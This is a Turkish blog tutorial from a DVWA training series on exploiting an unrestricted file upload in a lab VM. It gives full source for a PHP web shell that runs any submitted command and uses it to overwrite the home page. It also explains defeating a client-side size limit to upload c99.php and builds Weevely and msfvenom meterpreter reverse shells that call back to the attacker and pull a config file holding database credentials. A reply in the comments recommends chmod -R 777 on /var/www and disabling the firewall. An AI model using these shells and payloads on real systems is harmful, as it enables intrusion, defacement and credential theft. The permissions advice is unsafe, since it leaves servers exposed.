Ders 11 - File Upload (Low Level)

Bu yazıda DVWA adlı web uygulamasının içerisinde bulunan bir sayfanın güvenlik zafiyetinden faydalanarak File Upload yoluyla saldırıda bulunulacaktır.

Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten

DVWA Tüm Dersler

bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden

erişebilirsiniz.

Dersin Hedefi

Hedefiniz DVWA'nın anasayfasını hack'lemektir.

File Upload Nedir?

File Upload herkesin tahmin edebileceği gibi dosyaların arayüzdeki butonlar aracılığıyla uzak sisteme transfer edilmesi işlemine denir.

File Upload ile Nasıl Site Hack'lenir?

Bir php dosyası oluşturun. Mesela adına shell.php deyin. Ardından aşağıdaki kodları shell.php dosyasına kaydedin:



<form action="" method="GET" encytype="application/x-www-form-urlencoded">
	<table style="margin-left:auto; margin-right:auto;">
		<tr>
			<td colspan="2">Lütfen bir sistem komutu girin</td>
		</tr>
		<tr><td></td></tr>
		<tr>
			<td>Komut</td>
			<td>
				<input type="text" name="pCommand" size="50"/>
			</td>
		</tr>
		<tr>
			<td></td>
		</tr>
		<tr>
			<td colspan="2" style="text-align:center;">
				<input type="submit" value="Komutu Çalıştır"/>
			</td>
		</tr>
	</table>
</form>
<?php 
	echo "";
	echo shell_exec(@$_REQUEST["pCommand"]); 
	echo ""; 
?>

Ardından DVWA'nın File Upload sayfasından shell.php'iyi sisteme yükleyin. Yüklediğinizde şöyle bir bildirimle karşılaşacaksınız:

Kırmızı bildirimde görebileceğiniz üzere upload'ladığınız dosyanın bulunduğu link ifade edilmiş. O linke göre bulunduğumuz dizinin 2 kademe yukarısına çıkıp oradan hackable klasörüne sapıp oradan uploads'a geçerek upload'ladığımız dosyaya tarayıcı üzerinden erişebiliriz. Şimdi öyle yapalım. Bulunduğumuz dizin şudur:

http://localhost/dvwa/vulnerabilities/upload/#

İki kademe yukarı çıkarsak link şu olur:

http://localhost/dvwa/#

Ardından /hackable/uploads dizinine dallanalım:

http://localhost/dvwa/hackable/uploads/

Böylelikle upload'ladığımız shell.php dosyasının hedef sistemde bulunduğu dizine ulaşmış oluruz. Gerçek bir hack işlemi sırasında upload'lanan dosyanın yeri site tarafından kullanıcıya genellikle bildirilmez. Bu durumda saldırganın işi güçleşir. Fakat bir web sitesi düşünelim. Bu web sitesinde son kullanıcı resim upload'layabiliyor olsun. Saldırgan bu mekanizmanın yüklediği dosyaların nereye yüklendiğini öğrenebilmek için deneme maksadıya bir resim yükleyip web sitesinde resmi teşhir edildiği yere geçebilir ve görüntülenen resmin linkini sağ tık ile alarak upload'lanan dosyaların nereye gittiğini öğrenebilir.

Şimdi yüklediğimiz shell dosyasını görüntülemek için aşağıdaki linki tarayıcınıza girin:

http://localhost/dvwa/hackable/uploads/shell.php

Ekrana şöyle bir çıktı gelecektir:

Ekrandaki metin kutusuna gireceğiniz her bir Terminal/CMD komutu hedef sistem üzerinde çalıştırılacaktır ve dönen yanıt ekrana echo komutu ile basılacaktır. Hedef sistemin Linux bir sistem olduğunu varsayalım ve web sitenin anasayfasını bulmak maksadıyla keşif mahiyetinde bazı kodlar girelim. Ardından çıktılara göz atalım:

Girilen Komut: ls

shell.php dosyasının bulunduğu dizindeki dosyaların isimlerini ls komutu ile sıraladık. Şimdi bir üst dizine çıkıp üst dizindeki dosyaların isimlerini sıralayalım:

Girilen Komut: cd ..; ls

cd .. komutu sayesinde bir üst dizine çıktık. ls komutu ile de bulunulan dizindeki dosyaları sıraladık. .Şimdi bir üst dizine daha geçerek orada yer alan dosyaları sıralayalım:

Girilen Komut: cd ..; cd ..; ls

Resimdeki seçili dosya isminden görebileceğiniz üzere DVWA'nın anasayfa dosyasını tespit ettik. Şimdi bu sayfaya Hacked By Falan Filan diyerek sayfayı hack'leyelim.

NOT: Aşağıdaki işlemi yapmadan önce DVWA klasörünüz içindeki index.php'nin bir yedeğini alın. Çünkü içeriğini silip Hacked By Falan Filan yazacağız. İşimiz bittiğinde eski haline döndürmek için yedeği kullanabilirsiniz.

shell.php'deki metin kutusuna aşağıdaki kodu girin:

cd ..; cd ..; echo "<font color=red><center><h1>Hacked By Falan Filan</h1></center></font><br>" > index.php

Komutu çalıştır dediğiniz an anasayfa hack'lenmiş olur. Kontrol etmek için DVWA'nın anasayfasına geçiş yapın:

http://localhost/dvwa/index.php

Linke gittiğiniz takdirde sayfanın hack'lendiğine dair bildirimi görebilirsiniz:

Saldırı kodunda öncelikle iki kademe üst dizine çıkılmıştır. Böylelikle index.php'nin olduğu dizine geçilmiştir. Ardından echo komutu ile bir çıktı üretilmiştir. Oluşturulan bu çıktı echo'nun sağında yer alan > operatörü ile index.php dosyasının üzerine yazılmıştır (echo komutu tıpkı PHP'deki echo komutu gibi çıktı vermeye yarar).

Sayfaya metin eklenebildiği gibi resim, video da eklenebilir. Resim ve video için yapılması gereken şey yukarıdaki girilen saldırı kodunda yer alan echo'dan sonraki tırnakların içine ilgili resmin ya da video'nun linkini html olarak koymaktır.

Sonuç

Kısıtlanmamış bir upload mekanizması yüzünden bir site kolaylıkla hack'lenebilir. Bu tip saldırılara maruz kalmamak için kabul edilecek dosya uzantıları şeklinde PHP gibi bir dille kural oluşturulmalıdır. Kuralın dışında kalan dosyaların sunucuya yüklenmesi engellenmelidir.

Ekstra [Web Shell - C99.php]

Bu derste shell.php adlı dosyanın sunduğu arayüz ile bir sayfa hack'lemiş olduk. Dikkat ederseniz bu dosya adına shell dendi. Daha doğru tabirle web shell. Bunun bir nedeni var. Literatürde shell dosyaları diye geçer bu tip işleve sahip dosyalar. Yani hedef sunucu üzerinde komut çalıştırmamızı sağlayan dosyalara shell denmektedir. PHP dünyasında popüler olarak bilinen shell dosyaları c99.php ve r57.php dosyalarıdır. Bunlar yaklaşık 3000 satırlık koda sahiptir ve yukarıdaki kullandığımız basit shell dosyasına nazaran elle gireceğiniz birçok komut kodları yerine kısayol seçenekleriyle aynı işlemleri yapabilmenizi sağlar. Örneğin yukarıdaki shell.php dosyasını değil de c99.php'yi upload'lasaydınız tarayıcıdan c99.php'ye eriştiğinizde aşağıdaki gibi bir arayüz sizi karşılıyor olurdu:

[!] Uyarı:

c99.php shell dosyası çok fazla sayıda satır sayısına sahip olduğundan ve hedef dosya upload mekanizmasında bir dosya boyutu sınırlaması olduğundan upload'lama girişiminiz başarısız olacaktır. Fakat dosya boyut denetlemesi istemci taraflı yapılmakta olduğundan html kaynak koddaki form alanında, upload'layacağınız dosya ile beraber göndereceğiniz web uygulama dosya boyut limiti değerini elle değiştirebilir ve limiti arttırarak veya komple silerek sunucu kuralını atlatabilirsiniz. Böylece yukarıdaki c99.php dosyasını web sunucuya yükleyebilirsiniz.

c99 bir kontrol panelini andırıyor değil mi? :) Sayfa hack'lemek için bu derste kullandığımız sistem komutlarını kullanmadan c99.php'nin sunduğu arayüzden anasayfayı hack'lemeniz mümkündür. c99.php sistem komutlarını arkaplanda sizin yerinize yapmaktadır. Hepsi bu kadar.

Ekstra 2 [Reverse Shell - Weevely]

Weevely tool'u ile özel hazırlanmış bir web shell oluşturabilir, file upload saldırısı ile hedef sisteme yükleyebilir ve hedef sistemde reverse shell alabiliriz. Adımlar şu şekildedir:

Gereksinimler

* Saldırgan	:	Kali Linux 2022.1 VM
* Saldırgan Araç	:	Weevely
* Hedef Web Uygulama	:	DVWA ve WebGoat (Ubuntu 14.04 LTS) VM

1. Saldırgan weevely aracı ile bir post-exploitation agent'ı oluşturur.

Kali Linux Terminal:

weevely generate password123 agent.php		// agent.php oluşur.

2. Saldırgan hedef web uygulama dvwa'nın file upload zafiyeti yoluyla agent'ını web sunucuya upload'lar.

Kali Linux - Web Browser:

[UPLOAD] agent.php

3. Saldırgan weevely aracı ile hedef web sunucudaki agent'ına bağlanır ve shell oturumu alır.

Kali Linux Terminal:

weevely http://DVWA_WEB_SERVER_IP/dvwa/hackable/uploads/agent.php password123

[+] weevely 4.0.1
[+] Target:     192.168.56.136
[+] Session:    /root/.weevely/sessions/192.168.56.136/agent_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>

4. Saldırgan shell komutları çalıştırabilir.

Kali Linux Terminal:

weevely> whoami
www-data

www-data@iktestmakinesi:/var/www/dvwa/hackable/uploads $ hostname
iktestmakinesi

www-data@iktestmakinesi:/var/www/dvwa/hackable/uploads $ uname -a
Linux iktestmakinesi 3.13.0-24-generic #46-Ubuntu 
SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 
x86_64 GNU/Linux

www-data@iktestmakinesi:/var/www/dvwa/hackable/uploads $

5. Saldırgan agent ile post-exploitation için yapılabilecekleri şu şekilde listeler:

Kali Linux Terminal:

www-data@iktestmakinesi:/var/www/dvwa/hackable/uploads $ :help

6. Örneğin post-exploitation olarak hedef web sunucudaki bir dosyanın kaynak kodlarını okuyalım.

Kali Linux Terminal:

www-data@iktestmakinesi:/var/www/dvwa/hackable/uploads $ ls
abc.php
agent.php
dvwa_email.png

www-data@iktestmakinesi:/var/www/dvwa/hackable/uploads $ cd ../../
www-data@iktestmakinesi:/var/www/dvwa/ $ ls

...
index.php
...

www-data@iktestmakinesi:/var/www/dvwa/ $ cat index.php

((( kaynak kodlar )))

7. Örneğin post-exploitation olarak hedef web sunucudaki bir dosyayı yerel (saldırgan) sisteme indirelim

Kali Linux Terminal:

www-data@iktestmakinesi:/var/www/dvwa/ $ :file_download index.php /root/Desktop/index.php

(( Kali masaüstüne index.php iner )))

8. Örneğin post-exploitation olarak hedef web sunucudaki konfigürasyon dosyasını indirelim.

Kali Linux Terminal:

www-data@iktestmakinesi:/var/www/dvwa/ $ cd config/
www-data@iktestmakinesi:/var/www/dvwa/config/ $ ls

config.inc.php

www-data@iktestmakinesi:/var/www/dvwa/config/ $ :file_download config.inc.php /root/Desktop/config.inc.php

(( Konfigürasyon dosyası iner. İçeriği okunarak veritabanı
credential'ları alınabilir ve veritabanına atlama gerçekleş
tirilebilir ))

Ekstra 3 [Reverse Shell - Msfvenom]

Msfvenom tool'u ile özel hazırlanmış bir web shell oluşturabilir, file upload saldırısı yoluyla hedef sisteme yükleyebilir ve hedef sistemde reverse shell alabiliriz. Adımlar şu şekildedir:

Gereksinimler

* Saldırgan	:	Kali Linux 2022.1 VM
* Saldırgan Araç	:	Msfvenom & Msfconsole
* Hedef Web Uygulama	:	DVWA ve WebGoat (Ubuntu 14.04 LTS) VM

1. Saldırgan önce payload'u oluşturur:

Kali Linux VM Terminal #1:

msfvenom -l payloads | grep php
msfvenom -p php/meterpreter/reverse_tcp lhost=KALI_IP_ADDRESS lport=4444 -f raw > exploit.php

2. Saldırgan ardından dinleme moduna geçer.

Kali Linux VM Terminal #2:

msfconsole
msf6> use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost KALI_IP_ADDRESS
msf6 exploit(multi/handler) > run

3. Saldırgan ardından exploit.php payload'unu file upload zafiyeti yoluyla hedef web sunucuya upload'lar.

Kali Linux - Web Browser:

[UPLOAD] exploit.php

4. Saldırgan ardından exploit.php payload'unu hedef web sunucuda tetikler.

Kali Linux - Web Browser:

http://DVWA_WEB_SERVER_IP/dvwa/hackable/uploads/exploit.php

5. Böylece reverse tcp session multi/handler a gelir.

Kali Linux - Terminal #2:

msf6 exploit(multi/handler) > 

[*] Started reverse TCP handler on 192.168.56.134:4444 
[*] Sending stage (39282 bytes) to 192.168.56.136
[*] Meterpreter session 1 opened (192.168.56.134:4444 -> 192.168.56.136:59185 ) at 2025-03-20 00:20:41 +0300

meterpreter >

Artık içerdeyiz.

Yararlanılan Kaynak:

https://github.com/ethicalhack3r/DVWA/issues/5
https://www.youtube.com/watch?v=K7XBQWAZdZ4&list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q&index=6

Bu yazı 17.01.2016 tarihinde, saat 05:51:35'de yazılmıştır. 25.03.2025 tarihi ve 01:42:30 saatinde ise güncellenmiştir.

Yazar : Hasan Fatih ŞİMŞEK

Görüntülenme Sayısı : 4413

Yorumlar

yorum
c99.php atılmaya çalışıldığında şu çıktıyı veriyor "Your image was not uploaded." Ne yapabiliriz ?
Bu yorum 17.10.2016 tarihinde, saat 19:06:01'de gönderilmiştir.

Hasan Fatih ŞİMŞEK
shell.php dosyasını upload'layabilir durumdayken mi c99.php'yi upload'layamıyorsunuz yoksa her ikisini de mi upload'layamıyorsunuz? Eğer birinci durumsa dvwa'nın yüklü olduğu sunucudaki güvenlik mekanizmalarına takılıyor olabilirsiniz. Eğer ikinci durumsa sorun tamamen dosya izinleriyle alakalıdır. Dosya izinlerini gevşetmek için /var/www dizininize full izin verin ( chmod -R 777 /var/www ) Böylece sorununuz hallolacaktır. Birinci durum için ise dvwa'nın yüklü olduğu sunucudaki güvenlik duvarını devredışı bırakın ya da dvwa uzak bir sistemse barınıyorsa firewall cihazının kurallarını gevşetin. Böylece sorununuz hallolacaktır.
Bu yorum 27.08.2018 tarihinde, saat 13:05:08'de gönderilmiştir.

Hasan Fatih ŞİMŞEK
@yorum, bahsettiğiniz problemin varlığını keşfettim ve çözümünü uygulamalı Uyarı başlığı altında ilave ettim. Geri bildiriminiz için teşekkürler.
Bu yorum 30.04.2019 tarihinde, saat 09:53:40'de gönderilmiştir.

Yorum Ekle

	#Kategoriler
	->	Genel
	->	Webgoat Uygulaması
	->	DVWA Uygulaması
	->	Çeşitli Sızma Teknikleri
	->	Siber Güvenlik Araçları
	->	Linux Temelleri
	->	Siber Güvenlik Genel Kültür

#Popüler Yazılar
	->	Faz Açısını Hesaplama
	->	Hub, Switch, Router, Modem, Gateway ve Access Point Farkları
	->	Ders 12 - Ajax Security > DOM-Based cross-site scripting
	->	GET ile POST Arasındaki Fark
	->	BGA Sınav Soruları 2016

#En Son Yazılar
	->	DVWA Stored XSS (High Level)
	->	DVWA Blind SQL Injection (High Level)
	->	DVWA SQL Injection (High Level)
	->	DVWA Cross Site Request Forgery (High Level)
	->	DVWA Cross Site Request Forgery (Medium Level)

#Arşiv
	► 2014 ► Ekim (1) • Blog Maceram Başlar ► Kasım (7) • Parazit ve Gürültü Arasındaki Fark Nedir? • Stack ve Heap Arasındaki Fark • Sinyal Denkleminin Anlamı • Periyot ve Frekans Nedir? • Faz Açısını Hesaplama • Üniversite Öğrencilerinin Sağlık Aktivasyonu • Nesne Yönelimli Programlama Nedir ► Aralık (3) • Skype'ta Birbirimizin Sesini Nasıl Duyuyoruz? • Hub, Switch, Router, Modem, Gateway ve Access Point Farkları • Askerlikle İlgili Sorular ► 2015 ► Ocak (1) • Dev Firmaların Mülakatlarda Sorduğu 15 Çetin Soru ► Şubat (4) • Yapay Zeka İnsanı Geçemez • Webgoat Nedir? • Ubuntu 14.04 LTS Linux'a Webgoat Kurulumu • Windows'a Webgoat Kurulumu ► Mart (1) • Ders 1 - Introduction(Giriş) ► Nisan (3) • Ders 2 - General > Http Basics • Ders 3 - General > Http Split • Ders 4 - Access Control Flaws > Using an Access Control Matrix ► Mayıs (7) • Ders 5 - Access Control Flaws > Bypass a Path Based Access Control Scheme • Ders 6 - Role Based Access Control > Stage 1 • Ders 7 - Role Based Access Control > Stage 2 • Ders 8 - Role Based Access Control > Stage 3 • Ders 9 - Role Based Access Control > Stage 4 • Ders 10 - Access Control Flaws > Remote Admin Access • Ders 11 - Ajax Security > Same Origin Policy Protection ► Haziran (4) • Ders 12 - Ajax Security > DOM-Based cross-site scripting • Ders 13 - Ajax Security > Client Side Filtering • GET ile POST Arasındaki Fark • Ders 14 - Ajax Security > DOM Injection ► Temmuz (7) • Ders 15 - Ajax Security > XML Injection • Ders 16 - Ajax Security > JSON Injection • Ders 17 - Ajax Security > Silent Transactions Attacks • UML Sınıf Diyagramları • UML Sınıf Diyagramı İlişkileri • Association vs. Aggregation vs. Composition • Ders 18 - Ajax Security > Dangerous Use of Eval ► Ağustos (2) • Ders 19 - Ajax Security > Insecure Client Storage • Ders 20 - Authentication Flaws > Password Strength ► Eylül (11) • Ders 21 - Authentication Flaws > Forgot Password • Ders 22 - Authentication Flaws > Basic Authentication • Ders 23 - Authentication Flaws > Multi Level Login 1 • Ders 24 - Authentication Flaws > Multi Level Login 2 • Ders 25 - Buffer Overflows > Off-by-One Overflows • Ders 26 - Code Quality > Discover Clues in the HTML • Ders 27 - Concurrency > Thread Safety Problems • Ders 28 - Concurrency > Shopping Cart Concurrency Flaw • Ders 29 - Cross-Site Scripting (XSS) > Phishing with XSS • Ders 30 - Cross-Site Scripting (XSS) > Stage 1: Stored XSS • Ders 31 - Cross-Site Scripting > Stage 2: Block Stored XSS using Input Validation ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2016 ► Ocak (27) • DVWA Nedir? • Windows'a DVWA Kurulumu • Ubuntu 14.04 LTS Linux'a DVWA Kurulumu • Ders 1 - DVWA'ya Giriş • Ders 2 - Brute Force (Low Level) • Ders 3 - Brute Force (Medium Level) • Ders 4 - Command Injection (Low Level) • Ders 5 - Command Injection (Medium Level) • Ders 6 - Command Injection (High Level) • Ders 7 - Cross Site Request Forgery (Low Level) • Ders 8 - File Inclusion (Low Level) • Ders 9 - File Inclusion (Medium Level) • Ders 10 - File Inclusion (High Level) • Ders 11 - File Upload (Low Level) • Ders 12 - File Upload (Medium Level) • Ders 13 - File Upload (High Level) • Ders 14 - SQL Injection (Low Level) • Ders 15 - SQL Injection (Low Level) II • Ders 16 - SQL Injection (Medium Level) • Ders 17 - Blind SQL Injection (Low Level) • BGA Sınav Soruları 2016 • Ders 18 - Blind SQL Injection (Medium Level) • Ders 19 - Reflected XSS (Low Level) • Ders 20 - Reflected XSS (Medium Level) • Ders 21 - Reflected XSS (High Level) • Ders 22 - Stored XSS (Low Level) • Ders 23 - Stored XSS (Medium Level) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2017 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2018 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (1) • Ve Blog'a Döndüm ► Ekim (0) ► Kasım (6) • Metasploit Framework'e Giriş • Metasploit ile Bir Sızma Uygulaması (ms08-067) • Metasploit Saldırı Aşamaları (Özet) • Metasploit Komutları • Metasploit Detay Bilgiler • Metasploit Detay Bilgiler (Özet) ► Aralık (0) ► 2019 ► Ocak (0) ► Şubat (0) ► Mart (2) • Arp Spoofing Saldırısı Nedir ve Nasıl Yapılır • Arp Spoofing İlave Uygulamalar ► Nisan (0) ► Mayıs (0) ► Haziran (1) • Oyun Motoru Nedir ► Temmuz (1) • Haberleşme Teknolojisi ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2020 ► Ocak (1) • Siber Güvenlikte Düşük Seviye Açıklık Nedir ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2021 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2022 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (1) • Apache Web Sunucuyu Yurt Dışı (Türkiye Dışı) Trafiğe Kapama ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2023 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2024 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (58) • APT Saldırısı Nedir • Bug vs Vulnerability • CAPEC Nedir ve Kullanımı • CTF Nedir • CVE Nedir ve Kullanımı • CWE vs CVE • Character Set, Character Encoding ve Character Reference Nedir • Exploit Arama Yöntemi • Framework Nedir • Mirai Zararlısı Nedir • Paypal ve Güvenlik • RAT Nedir • Ransomware Nedir • Bir Siteye Shell Atmanın 20 Temel Yöntemi • Sisteminizi Shell'lerden Korumanın Yöntemleri • Sosyal Mühendislik Saldırı Türleri • Stagefright Virüsü Nedir • Vulnerability Scanner'ların Çalışma Mantığı • Crypto 101 - Notlarım • ASP.NET'te .config Dosyalarının Hiyerarşisi ve Sıkılaştırma için Web.config Dosyası Oluşturma • Authentication vs Authorization • Brute Force ve Dictionary Saldırılarını CSRF Token ile Önleme • CSRF Nedir ve Nasıl SameSite ile Tamamen Önlenir • Edge, Chrome ve Firefox'da Önbellek Tazeleme • DVWA Blind SQL Injection Hakkında Ek Not • HTTP Range Başlığı Nedir • Paylaşımlı Hosting'de Komşu Web Sitelerini Tespit Etme • Mass Deface Nedir • Cookie'ye HttpOnly, Secure ve Same-Site Bayraklarının Uygulanmaması Açıklığı • Email Adres İfşası Açıklığı • Feature Policy Başlığı • HTTP Strict Transport Security (HSTS) Başlığı Nedir • Insecure Frame Usage (External) Açıklığı • Güvensiz İletişim Güvenlik Protokolü Açıklığı • Content-Type Başlığı Eksikliği Açıklığı • Subresource Integrity (SRI) Eksikliği Açıklığı • Cacheable Https Response Açıklığı • CSRF Korumasız HTML Formu Açıklığı • Yanlış Yapılandırılmış Access-Control-Allow-Origin Başlığı Açıklığı • Remote File Inclusion (RFI) Saldırısı ve Korunma Yöntemi • Tamper Data Nedir • User Agent Başlığı Nedir • Web Hosting vs VPS Hosting • OWASP Mutillidae Web Uygulaması Açıklıklar Listesi • Mobil Penetrasyon Testi Nedir ve Neleri Kapsar? • iOS Uygulama Pentest - Kısa Kısa Notlarım • Kerberos Nedir • Temel Windows CMD Komutları • İnternet Ağı Şeması • DNS DOS Saldırılarına Karşı Önlem • DNS Zone Nedir • NAT (Network Address Translation) Nedir • Netcat ile Sistem Ele Geçirme Senaryosu Örneği • Nmap Kullanımı 1 - Çıkardığım Notlarım • Nmap Kullanımı 2 - Çıkardığım Notlarım • OSI ve TCP-IP • Proxy vs VPN • Router İçerisindeki Firewall ve DHCP ► Eylül (27) • SSH Tünelleme • Wireshark'ta Paket İçeriği (Raw Data) Neden Hex Gösterime Sahip • Linux Environment (Ortam) Değişkenleri • GNU, Özgür Yazılım, Copyleft ve GPL Nedir • GNU Utils vs Bash • Linux'ta Dizinlerin Amaçları ve Bazı Önemli Dosyalar • Linux Terminal Komutları • Standard Release Linux vs Rolling Release Linux • Tex Nedir • Özgür Yazılım Dünyasında Community (Topluluk) Nasıl Yazılım Geliştirebiliyor • UNIX Nedir • X Window System Nedir • Reverse Shell Alınmış Sistem Üzerinde Root - Administrator Yetkilerinde Kullanıcı Oluşturmak • AB Tool'u ile Bir Web Sunucuya GET Flood DoS Saldırısı • Apache Range Saldırıları ile Apache Web Sunucuları Servis Dışı Bırakma • DVWA Brute Force (High Level) • Cain Abel ile MySQL Hash Kırma • Curl ile Http Taleplerinde Bulunma • Konsoldan Http Talep Yapma • WebDAV Keşif ve Exploitation • Davtest Tool ile WebDAV Hacking • DVWA Command Injection ile Reverse Shell Alma Uygulamaları • DVWA Content Security Policy Başlığı Uygulamaları • DVWA Stored XSS Saldırısı ile Çerez Çalma • Google Hacking Database (GHDB) Kullanımı • Ettercap ile Parola Sniff'leme • Httrack Tool'u ile Web Site Klonlama ve Hesap Çalma ► Ekim (23) • Http PUT Metodu ile Dosya Upload'lama Uygulaması • Slow Http GET, Slow Http POST ve Slow Http Read DoS Saldırıları • Slowhttptest Kurulumu • Http Talep Paketlerinde Parametre Gönderim Yöntemleri • Telnet ve Netcat ile Http Taleplerinde Bulunma • Http Güvenlik Başlıkları Kullanan Günümüz Web Sitelere Örnekler • Antivirus Yazılımı Neden Kullanılmalı • Ses Dalgası Nedir • Fonksiyon Nedir • Logaritma Nedir • İntegral Nedir • Diferansiyel Nedir • Işık Yılı Nedir • NetworkMiner ile Trafik Analizi • Slow Http POST Saldırıları ile Nginx Sunucuları Servis Dışı Bırakma • SSL-TLS DoS Saldırısı ile Apache Web Sunucuları Servis Dışı Bırakma • SSLStrip Saldırısı Nedir ve Nasıl Uygulanır • Setoolkit ile Java Applet Saldırısı • Stored XSS ve Socat ile Çerez Çalma • ThinVNC 1.0b1 Directory Traversal Açıklığı ve Sömürme • Range Saldırısı ile Windows IIS Web Sunucuları Servis Dışı Bırakma • Websploit ile ARP Flood DoS Saldırısı • WRK Tool'u ile Bir Web Sunucuya GET Flood DoS Saldırısı ► Kasım (0) ► Aralık (0) ▼ 2025 ► Ocak (0) ► Şubat (0) ► Mart (6) • DVWA Brute Force (High Level) II • DVWA Cross Site Request Forgery (Medium Level) • DVWA Cross Site Request Forgery (High Level) • DVWA SQL Injection (High Level) • DVWA Blind SQL Injection (High Level) • DVWA Stored XSS (High Level)

#Giriş

	ID	:
	Şifre	: